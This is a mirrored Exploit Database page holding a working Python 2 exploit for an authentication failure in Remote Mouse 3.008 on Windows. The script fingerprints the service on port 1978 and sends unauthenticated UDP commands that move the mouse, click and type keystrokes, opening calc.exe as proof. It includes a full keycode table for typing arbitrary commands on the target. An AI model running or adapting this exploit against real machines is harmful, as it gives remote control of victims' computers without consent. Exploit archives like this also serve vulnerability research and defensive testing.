RemoteMouse 3.008 – Arbitrary Remote Command Execution

• Exploit Database
• 135 阅读

• 作者： 0rphon
  日期： 2019-04-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46697/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138

  # Exploit Title: Remote Mouse 3.008 - Failure to Authenticate # Date: 2019-09-04 # Exploit Author: 0rphon # Software Link: https://www.remotemouse.net/ # Version: 3.008 # Tested on: Windows 10   #Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it #This script pops calc as proof of concept (albeit a bit slowly) #It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself     #!/usr/bin/python2 from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM from time import sleep from sys import argv   def Ping(ip): try: target = socket(AF_INET, SOCK_STREAM) target.settimeout(5) target.connect((ip, 1978)) response=target.recv(1048) target.close() if response=="SIN 15win nop nop 300": return True else: return False except: print("ERROR: Request timed out")       def MoveMouse(x,y,ip): def SendMouse(command,times,ip): for x in range(times): target = socket(AF_INET, SOCK_DGRAM) target.sendto(command,(ip,1978)) sleep(0.001) if x>0: command="mos5m 1 0" SendMouse(command,x,ip) elif x<0: x=x*-1 command="mos5m -1 0" SendMouse(command,x,ip) if y>0: command="mos5m 0 1" SendMouse(command,y,ip) elif y<0: y=y*-1 command="mos6m 0 -1" SendMouse(command,y,ip)       def MousePress(command,ip,action="click"): if action=="down": target = socket(AF_INET, SOCK_DGRAM) target.sendto((command+" d"),(ip,1978)) elif action=="up": target = socket(AF_INET, SOCK_DGRAM) target.sendto((command+" u"),(ip,1978)) elif action=="click": target = socket(AF_INET, SOCK_DGRAM) target.sendto((command+" d"),(ip,1978)) target.sendto((command+" u"),(ip,1978)) else: raise Exception(&apos;MousePress: No action named "&apos;+str(action)+&apos;"&apos;)     def SendString(string,ip): for char in string: target = socket(AF_INET, SOCK_DGRAM) target.sendto(characters[char],(ip,1978)) sleep(0.5)         class mouse: leftClick="mos5R l" rightClick="mos5R r" middleClick="mos5R m"   characters={ "A":"key8[ras]116", "B":"key8[ras]119", "C":"key8[ras]118", "D":"key8[ras]113", "E":"key8[ras]112", "F":"key8[ras]115", "G":"key8[ras]114", "H":"key8[ras]125", "I":"key8[ras]124", "J":"key8[ras]127", "K":"key8[ras]126", "L":"key8[ras]121", "M":"key8[ras]120", "N":"key8[ras]123", "O":"key8[ras]122", "P":"key8[ras]101", "Q":"key8[ras]100", "R":"key8[ras]103", "S":"key8[ras]102", "T":"key7[ras]97", "U":"key7[ras]96", "V":"key7[ras]99", "W":"key7[ras]98", "X":"key8[ras]109", "Y":"key8[ras]108", "Z":"key8[ras]111",   "a":"key7[ras]84", "b":"key7[ras]87", "c":"key7[ras]86", "d":"key7[ras]81", "e":"key7[ras]80", "f":"key7[ras]83", "g":"key7[ras]82", "h":"key7[ras]93", "i":"key7[ras]92", "j":"key7[ras]95", "k":"key7[ras]94", "l":"key7[ras]89", "m":"key7[ras]88", "n":"key7[ras]91", "o":"key7[ras]90", "p":"key7[ras]69", "q":"key7[ras]68", "r":"key7[ras]71", "s":"key7[ras]70", "t":"key7[ras]65", "u":"key7[ras]64", "v":"key7[ras]67", "w":"key7[ras]66", "x":"key7[ras]77", "y":"key7[ras]76", "z":"key7[ras]79",   "1":"key6[ras]4", "2":"key6[ras]7", "3":"key6[ras]6", "4":"key6[ras]1", "5":"key6[ras]0", "6":"key6[ras]3", "7":"key6[ras]2", "8":"key7[ras]13", "9":"key7[ras]12", "0":"key6[ras]5",   "\n":"key3RTN", "\b":"key3BAS", " ":"key7[ras]21",   "+":"key7[ras]30", "=":"key6[ras]8", "/":"key7[ras]26", "_":"key8[ras]106", "<":"key6[ras]9", ">":"key7[ras]11", "[":"key8[ras]110", "]":"key8[ras]104", "!":"key7[ras]20", "@":"key8[ras]117", "#":"key7[ras]22", "$":"key7[ras]17", "%":"key7[ras]16", "^":"key8[ras]107", "&":"key7[ras]19", "*":"key7[ras]31", "(":"key7[ras]29", ")":"key7[ras]28", "-":"key7[ras]24", "&apos;":"key7[ras]18", &apos;"&apos;:"key7[ras]23", ":":"key7[ras]15", ";":"key7[ras]14", "?":"key7[ras]10", "`":"key7[ras]85", "~":"key7[ras]75", "\\":"key8[ras]105", "|":"key7[ras]73", "{":"key7[ras]78", "}":"key7[ras]72", ",":"key7[ras]25", ".":"key7[ras]27" }     def PopCalc(ip): MoveMouse(-5000,3000,ip) MousePress(mouse.leftClick,ip) sleep(1) SendString("calc.exe",ip) sleep(1) SendString("\n",ip) print("SUCCESS! Process calc.exe has run on target",ip)     def main(): try: targetIP=argv[1] except: print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1") exit() if Ping(targetIP)==True: PopCalc(targetIP) else: print("ERROR: Target machine is not running RemoteMouse") exit()   if __name__=="__main__": main()